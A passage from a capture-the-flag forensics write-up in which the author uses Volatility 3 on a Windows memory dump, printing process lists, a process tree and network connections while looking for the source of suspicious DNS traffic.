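        print(dom, stats)
```

On the real capture the interesting follow-up is the length profile: a constant (64, 64, 64, 17) shape says the sender pads to fixed-size chunks, which is why the fourth label is worth reading separately from the first three.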

We also have memory.raw, which is a 2GB memory dump. I decided to give Volatility 3 a spin to see if we can find anything that will tell us how to decipher the DNS communications:

python3 -m pip install -U distorm3 yara pycrypto pillow openpyxl ujson pytz ipython capstone 2>/dev/null
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3
# rm -rf ~/.cache/volatility3/data_*.cache
python3 vol.py -f /mnt/d/Programming/bits-and-bobbles/notes/assets/hackthebox/HTB-Business-CTF-2023/forensics_project_redline/memory.raw windows.pslist.PsList

We can see that the following programs were running:

PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

4       0       System  0xad81e4479040  152     -       N/A     False   2023-06-13 22:32:27.000000      N/A     Disabled
124     4       Registry        0xad81e45d0040  4       -       N/A     False   2023-06-13 22:32:23.000000      N/A     Disabled
408     4       smss.exe        0xad81e889e040  2       -       N/A     False   2023-06-13 22:32:27.000000      N/A     Disabled
516     504     csrss.exe       0xad81e860c080  11      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
592     504     wininit.exe     0xad81ead2a080  2       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
616     584     csrss.exe       0xad81ead340c0  12      -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
696     584     winlogon.exe    0xad81ead66080  5       -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
740     592     services.exe    0xad81ead23080  6       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
748     592     lsass.exe       0xad81ead81300  9       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
880     740     svchost.exe     0xad81eade9240  18      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
908     696     fontdrvhost.ex  0xad81eae1c140  5       -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
916     592     fontdrvhost.ex  0xad81eae1a140  5       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1004    740     svchost.exe     0xad81eaeab2c0  9       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
504     696     dwm.exe 0xad81eaf0a080  22      -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
1028    740     svchost.exe     0xad81eaf68240  57      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1168    740     upfc.exe        0xad81eafc0080  1       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1212    740     svchost.exe     0xad81eafcc2c0  16      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1220    740     svchost.exe     0xad81eafd92c0  8       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1240    740     svchost.exe     0xad81eafdc2c0  13      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1428    740     VBoxService.ex  0xad81ebc7a240  11      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1592    740     svchost.exe     0xad81ebcee280  16      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1684    4       MemCompression  0xad81ebd0e040  42      -       N/A     False   2023-06-13 12:32:33.000000      N/A     Disabled
1816    740     svchost.exe     0xad81ebdee0c0  11      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1892    740     svchost.exe     0xad81ebd0b080  4       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1924    740     svchost.exe     0xad81ebdf62c0  4       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1916    740     svchost.exe     0xad81ebdf22c0  16      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1932    740     svchost.exe     0xad81ebdf42c0  3       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1652    740     spoolsv.exe     0xad81ebdfa0c0  8       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2052    740     svchost.exe     0xad81ebe970c0  13      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2232    740     svchost.exe     0xad81ebea2080  12      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2256    740     MsMpEng.exe     0xad81ebf92340  12      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2620    1028    taskhostw.exe   0xad81ec0b02c0  6       -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
2788    740     svchost.exe     0xad81ec12a240  24      -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
2976    2620    ngentask.exe    0xad81ec1d6300  5       -       0       True    2023-06-13 12:32:34.000000      N/A     Disabled
2992    2620    ngentask.exe    0xad81ec1e1340  12      -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
3000    2992    conhost.exe     0xad81ec1e2080  4       -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
3032    2976    conhost.exe     0xad81ec1ef200  4       -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
2784    740     svchost.exe     0xad81ec2f3080  6       -       0       False   2023-06-13 12:32:35.000000      N/A     Disabled
788     2976    ngen.exe        0xad81ec3e3080  6       -       0       True    2023-06-13 12:32:35.000000      N/A     Disabled
3424    740     TrustedInstall  0xad81ec4d0080  3       -       0       False   2023-06-13 12:32:37.000000      N/A     Disabled
3468    880     TiWorker.exe    0xad81eac45080  2       -       0       False   2023-06-13 12:32:38.000000      N/A     Disabled
3924    740     svchost.exe     0xad81ec6782c0  7       -       1       False   2023-06-13 12:32:43.000000      N/A     Disabled
3932    1028    sihost.exe      0xad81ec679080  12      -       1       False   2023-06-13 12:32:43.000000      N/A     Disabled
3184    1028    taskhostw.exe   0xad81ec75d080  10      -       1       False   2023-06-13 12:32:44.000000      N/A     Disabled
3132    1592    ctfmon.exe      0xad81ec754240  12      -       1       False   2023-06-13 12:32:44.000000      N/A     Disabled
3420    696     userinit.exe    0xad81ec59d300  0       -       1       False   2023-06-13 12:32:46.000000      2023-06-13 12:33:15.000000      Disabled
2952    3420    explorer.exe    0xad81ebd3b300  65      -       1       False   2023-06-13 12:32:46.000000      N/A     Disabled
3316    740     svchost.exe     0xad81ebd3a080  3       -       1       False   2023-06-13 12:32:48.000000      N/A     Disabled
4104    740     svchost.exe     0xad81ecaa2080  3       -       0       False   2023-06-13 12:32:50.000000      N/A     Disabled
4172    740     SearchIndexer.  0xad81ec4cf080  16      -       0       False   2023-06-13 12:32:53.000000      N/A     Disabled
4328    880     StartMenuExper  0xad81ec5bb080  6       -       1       False   2023-06-13 12:32:54.000000      N/A     Disabled
4484    880     RuntimeBroker.  0xad81ecdce2c0  13      -       1       False   2023-06-13 12:32:55.000000      N/A     Disabled
4608    880     SearchApp.exe   0xad81ecdcd080  32      -       1       False   2023-06-13 12:32:55.000000      N/A     Disabled
4800    880     RuntimeBroker.  0xad81ed0ec2c0  6       -       1       False   2023-06-13 12:32:55.000000      N/A     Disabled
1284    880     RuntimeBroker.  0xad81ea9a2080  8       -       1       False   2023-06-13 12:33:05.000000      N/A     Disabled
2748    880     smartscreen.ex  0xad81ea9a4080  15      -       1       False   2023-06-13 12:33:07.000000      N/A     Disabled
2672    2952    SecurityHealth  0xad81ea2ec340  5       -       1       False   2023-06-13 12:33:07.000000      N/A     Disabled
5052    740     SecurityHealth  0xad81eaaf6080  27      -       0       False   2023-06-13 12:33:07.000000      N/A     Disabled
5124    2952    VBoxTray.exe    0xad81ea2ee080  13      -       1       False   2023-06-13 12:33:08.000000      N/A     Disabled
5200    2952    msedge.exe      0xad81ed0f8080  54      -       1       False   2023-06-13 12:33:08.000000      N/A     Disabled
5228    5200    msedge.exe      0xad81ea62b0c0  9       -       1       False   2023-06-13 12:33:08.000000      N/A     Disabled
5396    5200    msedge.exe      0xad81ea7c70c0  21      -       1       False   2023-06-13 12:33:09.000000      N/A     Disabled
5404    5200    msedge.exe      0xad81ea69a0c0  17      -       1       False   2023-06-13 12:33:09.000000      N/A     Disabled
5424    5200    msedge.exe      0xad81ecec90c0  11      -       1       False   2023-06-13 12:33:09.000000      N/A     Disabled
5896    880     ApplicationFra  0xad81ecaa4080  3       -       1       False   2023-06-13 12:33:52.000000      N/A     Disabled
4984    880     WmiPrvSE.exe    0xad81e856c2c0  9       -       0       False   2023-06-13 12:33:53.000000      N/A     Disabled
4092    740     svchost.exe     0xad81ea5ba2c0  3       -       0       False   2023-06-13 12:33:54.000000      N/A     Disabled
6108    1816    audiodg.exe     0xad81ec0c9080  4       -       0       False   2023-06-13 12:33:57.000000      N/A     Disabled
3780    740     svchost.exe     0xad81ea6e70c0  8       -       0       False   2023-06-13 12:34:34.000000      N/A     Disabled
6012    740     SgrmBroker.exe  0xad81ebd39080  7       -       0       False   2023-06-13 12:34:34.000000      N/A     Disabled
5916    880     MoUsoCoreWorke  0xad81ea8ac080  12      -       0       False   2023-06-13 12:34:35.000000      N/A     Disabled
604     740     svchost.exe     0xad81ea8aa080  15      -       0       False   2023-06-13 12:34:35.000000      N/A     Disabled
6264    740     svchost.exe     0xad81ea62e240  6       -       0       False   2023-06-13 12:34:38.000000      N/A     Disabled
6420    880     WmiPrvSE.exe    0xad81eaf08080  5       -       0       False   2023-06-13 12:34:44.000000      N/A     Disabled
6716    880     ShellExperienc  0xad81ec5be080  17      -       1       False   2023-06-13 12:34:56.000000      N/A     Disabled
6840    880     RuntimeBroker.  0xad81ea6d6300  6       -       1       False   2023-06-13 12:34:57.000000      N/A     Disabled
928     5200    msedge.exe      0xad81ecfab340  0       -       1       False   2023-06-13 12:35:16.000000      2023-06-13 12:35:44.000000      Disabled
5944    880     TextInputHost.  0xad81ea7b2300  12      -       1       False   2023-06-13 12:35:17.000000      N/A     Disabled
3880    5200    msedge.exe      0xad81eaa29080  16      -       1       False   2023-06-13 12:35:24.000000      N/A     Disabled
1052    5200    msedge.exe      0xad81eaa1f080  16      -       1       False   2023-06-13 12:35:24.000000      N/A     Disabled
6936    4172    SearchProtocol  0xad81ea5b8080  11      -       0       False   2023-06-13 12:35:29.000000      N/A     Disabled
4768    4172    SearchFilterHo  0xad81ed3cf340  6       -       0       False   2023-06-13 12:35:29.000000      N/A     Disabled
6884    5200    msedge.exe      0xad81ece6f080  14      -       1       False   2023-06-13 12:35:30.000000      N/A     Disabled
6612    2992    ngen.exe        0xad81eaa26080  4       -       0       False   2023-06-13 12:35:55.000000      N/A     Disabled
5736    2952    vlc.exe 0xad81e832c080  5       -       1       False   2023-06-13 12:35:57.000000      N/A     Disabled
6016    5200    msedge.exe      0xad81ed0fa080  20      -       1       False   2023-06-13 12:36:00.000000      N/A     Disabled
2248    788     mscorsvw.exe    0xad81ea1d8080  10      -       0       True    2023-06-13 12:36:13.000000      N/A     Disabled

Nothing is immediately obvious as out of place to me, so next I ran `windows.pstree.PsTree` to see whether any process had been spawned by a parent it shouldn't have:

PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime

4       0       System  0xad81e4479040  152     -       N/A     False   2023-06-13 22:32:27.000000      N/A
* 408   4       smss.exe        0xad81e889e040  2       -       N/A     False   2023-06-13 22:32:27.000000      N/A
* 1684  4       MemCompression  0xad81ebd0e040  42      -       N/A     False   2023-06-13 12:32:33.000000      N/A
* 124   4       Registry        0xad81e45d0040  4       -       N/A     False   2023-06-13 22:32:23.000000      N/A
616     584     csrss.exe       0xad81ead340c0  12      -       1       False   2023-06-13 22:32:31.000000      N/A
696     584     winlogon.exe    0xad81ead66080  5       -       1       False   2023-06-13 22:32:31.000000      N/A
* 504   696     dwm.exe 0xad81eaf0a080  22      -       1       False   2023-06-13 22:32:31.000000      N/A
** 592  504     wininit.exe     0xad81ead2a080  2       -       0       False   2023-06-13 22:32:31.000000      N/A
*** 916 592     fontdrvhost.ex  0xad81eae1a140  5       -       0       False   2023-06-13 22:32:31.000000      N/A
*** 740 592     services.exe    0xad81ead23080  6       -       0       False   2023-06-13 22:32:31.000000      N/A
**** 1028       740     svchost.exe     0xad81eaf68240  57      -       0       False   2023-06-13 22:32:31.000000      N/A
***** 3184      1028    taskhostw.exe   0xad81ec75d080  10      -       1       False   2023-06-13 12:32:44.000000      N/A
***** 2620      1028    taskhostw.exe   0xad81ec0b02c0  6       -       0       False   2023-06-13 12:32:34.000000      N/A
****** 2976     2620    ngentask.exe    0xad81ec1d6300  5       -       0       True    2023-06-13 12:32:34.000000      N/A
******* 3032    2976    conhost.exe     0xad81ec1ef200  4       -       0       False   2023-06-13 12:32:34.000000      N/A
******* 788     2976    ngen.exe        0xad81ec3e3080  6       -       0       True    2023-06-13 12:32:35.000000      N/A
******** 2248   788     mscorsvw.exe    0xad81ea1d8080  10      -       0       True    2023-06-13 12:36:13.000000      N/A
****** 2992     2620    ngentask.exe    0xad81ec1e1340  12      -       0       False   2023-06-13 12:32:34.000000      N/A
******* 3000    2992    conhost.exe     0xad81ec1e2080  4       -       0       False   2023-06-13 12:32:34.000000      N/A
******* 6612    2992    ngen.exe        0xad81eaa26080  4       -       0       False   2023-06-13 12:35:55.000000      N/A
***** 3932      1028    sihost.exe      0xad81ec679080  12      -       1       False   2023-06-13 12:32:43.000000      N/A
**** 1924       740     svchost.exe     0xad81ebdf62c0  4       -       0       False   2023-06-13 12:32:33.000000      N/A
**** 2052       740     svchost.exe     0xad81ebe970c0  13      -       0       False   2023-06-13 12:32:33.000000      N/A
**** 4104       740     svchost.exe     0xad81ecaa2080  3       -       0       False   2023-06-13 12:32:50.000000      N/A
**** 1932       740     svchost.exe     0xad81ebdf42c0  3       -       0       False   2023-06-13 12:32:33.000000      N/A
**** 1168       740     upfc.exe        0xad81eafc0080  1       -       0       False   2023-06-13 22:32:31.000000      N/A
**** 1428       740     VBoxService.ex  0xad81ebc7a240  11      -       0       False   2023-06-13 22:32:31.000000      N/A
**** 1816       740     svchost.exe     0xad81ebdee0c0  11      -       0       False   2023-06-13 12:32:33.000000      N/A
***** 6108      1816    audiodg.exe     0xad81ec0c9080  4       -       0       False   2023-06-13 12:33:57.000000      N/A
**** 6012       740     SgrmBroker.exe  0xad81ebd39080  7       -       0       False   2023-06-13 12:34:34.000000      N/A
**** 1592       740     svchost.exe     0xad81ebcee280  16      -       0       False   2023-06-13 12:32:33.000000      N/A
***** 3132      1592    ctfmon.exe      0xad81ec754240  12      -       1       False   2023-06-13 12:32:44.000000      N/A
**** 2232       740     svchost.exe     0xad81ebea2080  12      -       0       False   2023-06-13 12:32:33.000000      N/A
**** 1212       740     svchost.exe     0xad81eafcc2c0  16      -       0       False   2023-06-13 22:32:31.000000      N/A
**** 5052       740     SecurityHealth  0xad81eaaf6080  27      -       0       False   2023-06-13 12:33:07.000000      N/A
**** 1220       740     svchost.exe     0xad81eafd92c0  8       -       0       False   2023-06-13 22:32:31.000000      N/A
**** 3780       740     svchost.exe     0xad81ea6e70c0  8       -       0       False   2023-06-13 12:34:34.000000      N/A
**** 4172       740     SearchIndexer.  0xad81ec4cf080  16      -       0       False   2023-06-13 12:32:53.000000      N/A
***** 6936      4172    SearchProtocol  0xad81ea5b8080  11      -       0       False   2023-06-13 12:35:29.000000      N/A
***** 4768      4172    SearchFilterHo  0xad81ed3cf340  6       -       0       False   2023-06-13 12:35:29.000000      N/A
**** 2256       740     MsMpEng.exe     0xad81ebf92340  12      -       0       False   2023-06-13 12:32:33.000000      N/A
**** 3924       740     svchost.exe     0xad81ec6782c0  7       -       1       False   2023-06-13 12:32:43.000000      N/A
**** 1240       740     svchost.exe     0xad81eafdc2c0  13      -       0       False   2023-06-13 22:32:31.000000      N/A
**** 604        740     svchost.exe     0xad81ea8aa080  15      -       0       False   2023-06-13 12:34:35.000000      N/A
**** 2784       740     svchost.exe     0xad81ec2f3080  6       -       0       False   2023-06-13 12:32:35.000000      N/A
**** 3424       740     TrustedInstall  0xad81ec4d0080  3       -       0       False   2023-06-13 12:32:37.000000      N/A
**** 1892       740     svchost.exe     0xad81ebd0b080  4       -       0       False   2023-06-13 12:32:33.000000      N/A
**** 2788       740     svchost.exe     0xad81ec12a240  24      -       0       False   2023-06-13 12:32:34.000000      N/A
**** 1004       740     svchost.exe     0xad81eaeab2c0  9       -       0       False   2023-06-13 22:32:31.000000      N/A
**** 4092       740     svchost.exe     0xad81ea5ba2c0  3       -       0       False   2023-06-13 12:33:54.000000      N/A
**** 880        740     svchost.exe     0xad81eade9240  18      -       0       False   2023-06-13 22:32:31.000000      N/A
***** 4608      880     SearchApp.exe   0xad81ecdcd080  32      -       1       False   2023-06-13 12:32:55.000000      N/A
***** 4800      880     RuntimeBroker.  0xad81ed0ec2c0  6       -       1       False   2023-06-13 12:32:55.000000      N/A
***** 4484      880     RuntimeBroker.  0xad81ecdce2c0  13      -       1       False   2023-06-13 12:32:55.000000      N/A
***** 1284      880     RuntimeBroker.  0xad81ea9a2080  8       -       1       False   2023-06-13 12:33:05.000000      N/A
***** 5916      880     MoUsoCoreWorke  0xad81ea8ac080  12      -       0       False   2023-06-13 12:34:35.000000      N/A
***** 4328      880     StartMenuExper  0xad81ec5bb080  6       -       1       False   2023-06-13 12:32:54.000000      N/A
***** 5896      880     ApplicationFra  0xad81ecaa4080  3       -       1       False   2023-06-13 12:33:52.000000      N/A
***** 3468      880     TiWorker.exe    0xad81eac45080  2       -       0       False   2023-06-13 12:32:38.000000      N/A
***** 6840      880     RuntimeBroker.  0xad81ea6d6300  6       -       1       False   2023-06-13 12:34:57.000000      N/A
***** 5944      880     TextInputHost.  0xad81ea7b2300  12      -       1       False   2023-06-13 12:35:17.000000      N/A
***** 6420      880     WmiPrvSE.exe    0xad81eaf08080  5       -       0       False   2023-06-13 12:34:44.000000      N/A
***** 4984      880     WmiPrvSE.exe    0xad81e856c2c0  9       -       0       False   2023-06-13 12:33:53.000000      N/A
***** 2748      880     smartscreen.ex  0xad81ea9a4080  15      -       1       False   2023-06-13 12:33:07.000000      N/A
***** 6716      880     ShellExperienc  0xad81ec5be080  17      -       1       False   2023-06-13 12:34:56.000000      N/A
**** 1652       740     spoolsv.exe     0xad81ebdfa0c0  8       -       0       False   2023-06-13 12:32:33.000000      N/A
**** 3316       740     svchost.exe     0xad81ebd3a080  3       -       1       False   2023-06-13 12:32:48.000000      N/A
**** 6264       740     svchost.exe     0xad81ea62e240  6       -       0       False   2023-06-13 12:34:38.000000      N/A
**** 1916       740     svchost.exe     0xad81ebdf22c0  16      -       0       False   2023-06-13 12:32:33.000000      N/A
*** 748 592     lsass.exe       0xad81ead81300  9       -       0       False   2023-06-13 22:32:31.000000      N/A
** 516  504     csrss.exe       0xad81e860c080  11      -       0       False   2023-06-13 22:32:31.000000      N/A
* 908   696     fontdrvhost.ex  0xad81eae1c140  5       -       1       False   2023-06-13 22:32:31.000000      N/A
* 3420  696     userinit.exe    0xad81ec59d300  0       -       1       False   2023-06-13 12:32:46.000000      2023-06-13 12:33:15.000000
** 2952 3420    explorer.exe    0xad81ebd3b300  65      -       1       False   2023-06-13 12:32:46.000000      N/A
*** 2672        2952    SecurityHealth  0xad81ea2ec340  5       -       1       False   2023-06-13 12:33:07.000000      N/A
*** 5736        2952    vlc.exe 0xad81e832c080  5       -       1       False   2023-06-13 12:35:57.000000      N/A
*** 5200        2952    msedge.exe      0xad81ed0f8080  54      -       1       False   2023-06-13 12:33:08.000000      N/A
**** 928        5200    msedge.exe      0xad81ecfab340  0       -       1       False   2023-06-13 12:35:16.000000      2023-06-13 12:35:44.000000
**** 6016       5200    msedge.exe      0xad81ed0fa080  20      -       1       False   2023-06-13 12:36:00.000000      N/A
**** 6884       5200    msedge.exe      0xad81ece6f080  14      -       1       False   2023-06-13 12:35:30.000000      N/A
**** 3880       5200    msedge.exe      0xad81eaa29080  16      -       1       False   2023-06-13 12:35:24.000000      N/A
**** 5228       5200    msedge.exe      0xad81ea62b0c0  9       -       1       False   2023-06-13 12:33:08.000000      N/A
**** 1052       5200    msedge.exe      0xad81eaa1f080  16      -       1       False   2023-06-13 12:35:24.000000      N/A
**** 5424       5200    msedge.exe      0xad81ecec90c0  11      -       1       False   2023-06-13 12:33:09.000000      N/A
**** 5396       5200    msedge.exe      0xad81ea7c70c0  21      -       1       False   2023-06-13 12:33:09.000000      N/A
**** 5404       5200    msedge.exe      0xad81ea69a0c0  17      -       1       False   2023-06-13 12:33:09.000000      N/A
*** 5124        2952    VBoxTray.exe    0xad81ea2ee080  13      -       1       False   2023-06-13 12:33:08.000000      N/A

Again, nothing obviously shady, but we see several instances of MS Edge running, which the description hinted may have been the initial source of the infection. Let's take a look at the network connections with netscan to see if there's anything shady there:

Offset  Proto   LocalAddr       LocalPort       ForeignAddr     ForeignPort     State   PID     Owner   Created

0xad81e44e0320  TCPv4   10.0.2.15       49830   173.222.107.76  443     ESTABLISHED     5404    msedge.exe      2023-06-13 12:36:17.000000
0xad81e832d010  TCPv4   10.0.2.15       49828   152.199.19.161  80      ESTABLISHED     5404    msedge.exe      2023-06-13 12:36:09.000000
0xad81e880e1b0  TCPv4   0.0.0.0 49667   0.0.0.0 0       LISTENING       1652    spoolsv.exe     2023-06-13 12:32:33.000000
0xad81e880e1b0  TCPv6   ::      49667   ::      0       LISTENING       1652    spoolsv.exe     2023-06-13 12:32:33.000000
0xad81e880e470  TCPv4   0.0.0.0 49666   0.0.0.0 0       LISTENING       1028    svchost.exe     2023-06-13 22:32:31.000000
0xad81e880e5d0  TCPv4   0.0.0.0 135     0.0.0.0 0       LISTENING       1004    svchost.exe     2023-06-13 22:32:31.000000
0xad81e880e5d0  TCPv6   ::      135     ::      0       LISTENING       1004    svchost.exe     2023-06-13 22:32:31.000000
0xad81e880e730  TCPv4   0.0.0.0 49666   0.0.0.0 0       LISTENING       1028    svchost.exe     2023-06-13 22:32:31.000000
0xad81e880e730  TCPv6   ::      49666   ::      0       LISTENING       1028    svchost.exe     2023-06-13 22:32:31.000000
0xad81e880e890  TCPv4   0.0.0.0 49664   0.0.0.0 0       LISTENING       748     lsass.exe       2023-06-13 22:32:31.000000
0xad81e880ee10  TCPv4   0.0.0.0 49668   0.0.0.0 0       LISTENING       740     services.exe    2023-06-13 12:32:34.000000
0xad81e880ee10  TCPv6   ::      49668   ::      0       LISTENING       740     services.exe    2023-06-13 12:32:34.000000
0xad81e880f0d0  TCPv4   0.0.0.0 49667   0.0.0.0 0       LISTENING       1652    spoolsv.exe     2023-06-13 12:32:33.000000
0xad81e880f230  TCPv4   0.0.0.0 49664   0.0.0.0 0       LISTENING       748     lsass.exe       2023-06-13 22:32:31.000000
0xad81e880f230  TCPv6   ::      49664   ::      0       LISTENING       748     lsass.exe       2023-06-13 22:32:31.000000
0xad81e880f4f0  TCPv4   0.0.0.0 49665   0.0.0.0 0       LISTENING       592     wininit.exe     2023-06-13 22:32:31.000000
0xad81e880f650  TCPv4   0.0.0.0 445     0.0.0.0 0       LISTENING       4       System  2023-06-13 12:32:34.000000
0xad81e880f650  TCPv6   ::      445     ::      0       LISTENING       4       System  2023-06-13 12:32:34.000000
0xad81e880f7b0  TCPv4   0.0.0.0 135     0.0.0.0 0       LISTENING       1004    svchost.exe     2023-06-13 22:32:31.000000
0xad81e880f910  TCPv4   0.0.0.0 49668   0.0.0.0 0       LISTENING       740     services.exe    2023-06-13 12:32:34.000000
0xad81e880fe90  TCPv4   0.0.0.0 49665   0.0.0.0 0       LISTENING       592     wininit.exe     2023-06-13 22:32:31.000000
0xad81e880fe90  TCPv6   ::      49665   ::      0       LISTENING       592     wininit.exe     2023-06-13 22:32:31.000000
0xad81ea0efb50  TCPv4   10.0.2.15       49682   20.82.19.171    443     CLOSED  2256    MsMpEng.exe     2023-06-13 12:33:59.000000
0xad81ea1c7b50  TCPv4   10.0.2.15       139     0.0.0.0 0       LISTENING       4       System  2023-06-13 12:32:35.000000
0xad81ea1c80d0  TCPv4   0.0.0.0 7680    0.0.0.0 0       LISTENING       3780    svchost.exe     2023-06-13 12:34:34.000000
0xad81ea1c80d0  TCPv6   ::      7680    ::      0       LISTENING       3780    svchost.exe     2023-06-13 12:34:34.000000
0xad81ea5c0010  TCPv4   10.0.2.15       49815   93.184.221.240  80      ESTABLISHED     1916    svchost.exe     2023-06-13 12:35:41.000000
0xad81eafc24a0  TCPv4   10.0.2.15       49829   204.79.197.239  443     ESTABLISHED     5404    msedge.exe      2023-06-13 12:36:09.000000
0xad81ebec9b20  UDPv4   0.0.0.0 5355    *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ebec9b20  UDPv6   ::      5355    *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ebf0e3e0  UDPv4   127.0.0.1       55881   *       0               1028    svchost.exe     2023-06-13 12:32:34.000000
0xad81ec10c1d0  UDPv4   0.0.0.0 58418   *       0               4484    RuntimeBroker.  2023-06-13 12:36:13.000000
0xad81ec25b650  UDPv4   0.0.0.0 0       *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ec25b650  UDPv6   ::      0       *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ec25e210  UDPv4   0.0.0.0 5353    *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ec25e3a0  UDPv4   0.0.0.0 5355    *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ec25eb70  UDPv4   10.0.2.15       137     *       0               4       System  2023-06-13 12:32:35.000000
0xad81ec25f1b0  UDPv4   10.0.2.15       138     *       0               4       System  2023-06-13 12:32:35.000000
0xad81ec25f980  UDPv4   0.0.0.0 5353    *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ec25f980  UDPv6   ::      5353    *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ec9709d0  UDPv4   0.0.0.0 54702   *       0               4484    RuntimeBroker.  2023-06-13 12:36:01.000000
0xad81ec975b10  UDPv4   0.0.0.0 53028   *       0               5404    msedge.exe      2023-06-13 12:36:01.000000
0xad81ec97bbf0  UDPv4   0.0.0.0 52187   *       0               5404    msedge.exe      2023-06-13 12:36:01.000000
0xad81ec990a50  UDPv4   0.0.0.0 56357   *       0               5404    msedge.exe      2023-06-13 12:35:26.000000
0xad81ecee44a0  TCPv4   10.0.2.15       49793   62.210.246.226  443     ESTABLISHED     5404    msedge.exe      2023-06-13 12:35:26.000000
0xad81ed3b6930  TCPv4   10.0.2.15       49817   192.229.221.95  80      ESTABLISHED     2748    smartscreen.ex  2023-06-13 12:35:56.000000
0xad81ed48c0c0  UDPv4   0.0.0.0 5353    *       0               5200    msedge.exe      2023-06-13 12:36:09.000000
0xad81ed48c250  UDPv4   0.0.0.0 58109   *       0               4484    RuntimeBroker.  2023-06-13 12:36:18.000000
0xad81ed490260  UDPv4   0.0.0.0 5353    *       0               5200    msedge.exe      2023-06-13 12:36:09.000000
0xad81ed490260  UDPv6   ::      5353    *       0               5200    msedge.exe      2023-06-13 12:36:09.000000

I saw a handful of external IP addresses, so I visited each of them to see if there was anything immediately suspicious about them:

  • 62.210.246.226: an opendir of /videolan/
  • 152.199.19.161: a 404 page, belongs to the Edgecast CDN
  • 173.222.107.76: invalid URL page; belongs to Akamai
  • 93.184.221.240: 404 page, Edgecast CDN
  • 192.229.221.95: "CRL/CACERT Repository" page, belongs to Edgecast
  • 20.82.19.171: failed to connect
  • 204.79.197.239: service unavailable page, belongs to Microsoft

Unfortunately all the DNS requests in our capture are to the local IP 192.168.1.120, so these external IPs don't give us a smoking gun. Using a tip from CQURE, I tried windows.psscan.PsScan next to see if there were any hidden processes running on the system:

PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

4       0       System  0xad81e4479040  152     -       N/A     False   2023-06-13 22:32:27.000000      N/A     Disabled
124     4       Registry        0xad81e45d0040  4       -       N/A     False   2023-06-13 22:32:23.000000      N/A     Disabled
5736    2952    vlc.exe 0xad81e832c080  5       -       1       False   2023-06-13 12:35:57.000000      N/A     Disabled
4984    880     WmiPrvSE.exe    0xad81e856c2c0  9       -       0       False   2023-06-13 12:33:53.000000      N/A     Disabled
516     504     csrss.exe       0xad81e860c080  11      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
408     4       smss.exe        0xad81e889e040  2       -       N/A     False   2023-06-13 22:32:27.000000      N/A     Disabled
2248    788     mscorsvw.exe    0xad81ea1d8080  10      -       0       True    2023-06-13 12:36:13.000000      N/A     Disabled
2672    2952    SecurityHealth  0xad81ea2ec340  5       -       1       False   2023-06-13 12:33:07.000000      N/A     Disabled
5124    2952    VBoxTray.exe    0xad81ea2ee080  13      -       1       False   2023-06-13 12:33:08.000000      N/A     Disabled
6936    4172    SearchProtocol  0xad81ea5b8080  11      -       0       False   2023-06-13 12:35:29.000000      N/A     Disabled
4092    740     svchost.exe     0xad81ea5ba2c0  3       -       0       False   2023-06-13 12:33:54.000000      N/A     Disabled
5228    5200    msedge.exe      0xad81ea62b0c0  9       -       1       False   2023-06-13 12:33:08.000000      N/A     Disabled
6264    740     svchost.exe     0xad81ea62e240  6       -       0       False   2023-06-13 12:34:38.000000      N/A     Disabled
5404    5200    msedge.exe      0xad81ea69a0c0  17      -       1       False   2023-06-13 12:33:09.000000      N/A     Disabled
6840    880     RuntimeBroker.  0xad81ea6d6300  6       -       1       False   2023-06-13 12:34:57.000000      N/A     Disabled
3780    740     svchost.exe     0xad81ea6e70c0  8       -       0       False   2023-06-13 12:34:34.000000      N/A     Disabled
5944    880     TextInputHost.  0xad81ea7b2300  12      -       1       False   2023-06-13 12:35:17.000000      N/A     Disabled
5396    5200    msedge.exe      0xad81ea7c70c0  21      -       1       False   2023-06-13 12:33:09.000000      N/A     Disabled
604     740     svchost.exe     0xad81ea8aa080  15      -       0       False   2023-06-13 12:34:35.000000      N/A     Disabled
5916    880     MoUsoCoreWorke  0xad81ea8ac080  12      -       0       False   2023-06-13 12:34:35.000000      N/A     Disabled
